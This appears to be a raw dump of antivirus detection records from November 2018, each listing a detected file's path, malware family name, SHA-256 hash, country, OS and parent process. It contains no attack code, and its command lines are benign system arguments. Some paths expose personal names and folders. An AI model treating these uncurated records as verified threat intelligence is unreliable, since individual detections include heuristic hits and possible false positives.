  Row(detection=Row(filename='a0000966.exe', filepath='f:\\system volume information\\_restore{4e5c790a-6dd2-469c-90c3-c184502b8d66}\\rp1\\A0000966.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='d09530b86f4debfe425f40d70277171faf390c5066c53c330fcc96f1950cbdda', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:11:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='curricula base.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\DOTE UNICA LAVORO NUOVA 2016-2018\\ADESIONI DUL\\BONANDRINI FABIO\\CURRICULA BONANDRINI\\CURRICULA BASE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:08:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-193309-fc9f4762', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-192912-DBAA71AF\\AVSCAN-20181102-193309-FC9F4762', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9a9e6683d5460ea4f6716b72b56ca888d7b455d36a42c69a01ed947adb0f0c9f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:34:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hdeck.exe', filepath='D:\\Omarlys\\CONTACTOS OMARLYS\\VIA_Win7-64_Win7_Vista64_Vista_XP64_XP_2K(v7700d)\\VIAHDAud\\Present\\HDADeck\\HDeck.exe', filesize=33792000, name='W32/Sality.AT.#M1.#R1'), hash='94daaf7ace0c643160d72ae93d67c7421c433db4d5f8ea38279a0b5d9115fa13', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Nox\\bin\\Nox.exe', parentsize=6017792, timestamp='2018-11-02T10:52:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='H:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M1.#R1'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:39:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:51:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b5tclient.exe', filepath='C:\\Users\\X\\AppData\\Local\\B5T\\6.0.5.7\\B5TClient.exe', filesize=904000, name='Adware/Bang5Mai.IE.#M1.#R1'), hash='bc52336fc528d61dc9b9543f652eb7e1dc4c4263e3dd434d26548fed3f4ae3f6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='beee8bcfa0ace7a2948bd2903d990afd.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_2066938746\\beee8bcfa0ace7a2948bd2903d990afd.smp', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='e7c0ceb9ca1ffeb43646feef0b15f524b78928310015fcfdd8b227e8bfef466d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T18:10:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204532-77f3e46a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204532-77F3E46A', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:45:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='phieu lien lac.exe', filepath='G:\\\xa0\\phieu lien lac.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='eebe47d403a6c587bc4d9a37342fa4a91545fcec230d486d3bfb8780b0ee168f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:53:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204204-5c1977e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204204-5C1977E1', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='e5a603ccac1f21a133ee0f5faa65cf59c12575608b0d3caa0de109e49649cce3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T10:08:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T14:22:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185448-00785f93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-185448-00785F93', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:54:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e836', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e836', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:02:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:45:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185207-eadc15c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-185207-EADC15C5', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:52:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='IT', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:51:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cfp.exe', filepath='C:\\Users\\X\\Desktop\\Miracle Box 2.27A Crac k by HiRSH GSM\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='dd5928d6a46fc44a1e0ad820a8c3242a181bc30bd84c972839ef3998ef8eeb85', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T00:51:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-183556-5c8e1dfa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_09da0715\\AVSCAN-20181104-172514-D97E5C6F\\AVSCAN-20181104-183556-5C8E1DFA', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='ff876ae39b6165cef367fa94c2fad8d9f92187851d490e3e38fe1a76cad6b91c', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:35:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121031-ba7a89e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_22468eb7\\AVSCAN-20181104-120739-A277F632\\AVSCAN-20181104-121031-BA7A89E7', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:10:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-28-014525/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:17:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gccustomhook.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\AdobeGCClient\\customhook\\gccustomhook.exe', filesize=1976000, name='W32/Sality.AT.#M1.#R1'), hash='f9ad4e88dc6d468f7e5dbaf4ee5246095b2c767ccd9da38dee4f1f149f917baf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=4014136, timestamp='2018-11-01T10:39:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rnswe830.exe', filepath='C:\\Users\\X\\AppData\\Local\\032B0290-1429625764-057E-6806-180700080009\\rnswE830.exe', filesize=64000, name='HEUR/AGEN.1001886.#M1.#R1'), hash='fccdf318832dcd1c32a689bcbdb7b9de8a74773302e065fc5279faf02d71d703', metadata=Row(cmdline='\\\\\\/s \\\\\\"NortonSecurity\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files (x86)\\\\\\\\Norton AntiVirus\\\\\\\\Engine\\\\\\\\22.16.0.247\\\\\\\\diMaster.dll\\\\\\" \\\\\\/prefetch:1', country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Norton AntiVirus\\Engine\\22.16.0.247\\NortonSecurity.exe', parentsize=328648, timestamp='2018-11-01T17:40:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lfs.exe', filepath='D:\\Games\\Live For Speed\\speed\\LFS.exe', filesize=2048000, name='W32/Jadtre.B.#M1.#R1'), hash='f595fad07af23d675645836760336d4a0da4d1c327123b5eb65cab485f9f67ba', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=35176, timestamp='2018-11-01T00:07:39Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-00-43-38.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T23:53:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T17:13:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='m1.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\ZBD\\M1\\M1.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='21ca02bada3946e0cd7cd5369227ca9f3cecef0e0eb5b890a5bae158c0c715dd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='etc.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\ETC\\ETC.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161250-fc16dd41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d03467a9\\AVSCAN-20181102-161224-F7C6D479\\AVSCAN-20181102-161250-FC16DD41', filesize=128000, name='TR/Patched.Ren.Gen.#M1.#R1'), hash='4907717a484cf9f641a48a8c9529c911cca64b82a232d48c27db83f6427d27fa', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:13:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T02:08:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3F81ED12CF783663ACE3F754BB552275736986B0A32BAD2F9B6B660428C149A7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:21:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\Windows\\SysWOW64\\MUI\\S-1-5-86\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='UZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3acb101f65db262e99d1e72e32521302aba93acff694d03671a4e46c4f5d5a9d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T04:22:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='36c95d9779bd6d8905c73a1586949a1ec3a9b1b3952eb5994d70c74098504ff4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T04:25:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='locale.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\platform\\lib\\locale\\locale.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:27:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T07:05:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4170681\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='E:\\GAMES dari Pakdhe\\Download Trainz Simulator v1.3.7 cafe4ndroid.com.apk_4098468946.exe', parentsize=2409021, timestamp='2018-11-02T02:43:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155912-e80c79c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155912-E80C79C9', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='\\\\?\\C:\\Users\\X\\Downloads\\Autocad2009_minixiazai.com(1)\\cad2009zwpjb\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='3b0950320e586a4d87626480f0a1c30d2426588664de0c16caf5ba0ba0f25c27', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:40:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hosts-bg.exe', filepath='\\\\?\\C:\\program files (x86)\\hosts\\hosts-bg.exe', filesize=896000, name='ADWARE/CrossRider.Gen2.#M1.#R1'), hash='043263a827d1399a6a67c283c2dae406a399f7e976a95c897b20a5d70cefcd06', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:27:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Windows\\system32\\config\\aol\\2\\1\\1\\2\\2\\1\\1\\1\\1\\1\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.71.#M1.#R1'), hash='298cbe85ed29c3da3c0911f41b694304300d80e5b7bb00626165260169b0ac87', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:20:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:02:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:27Z'), dt=datetime.date(2018, 11, 2)),
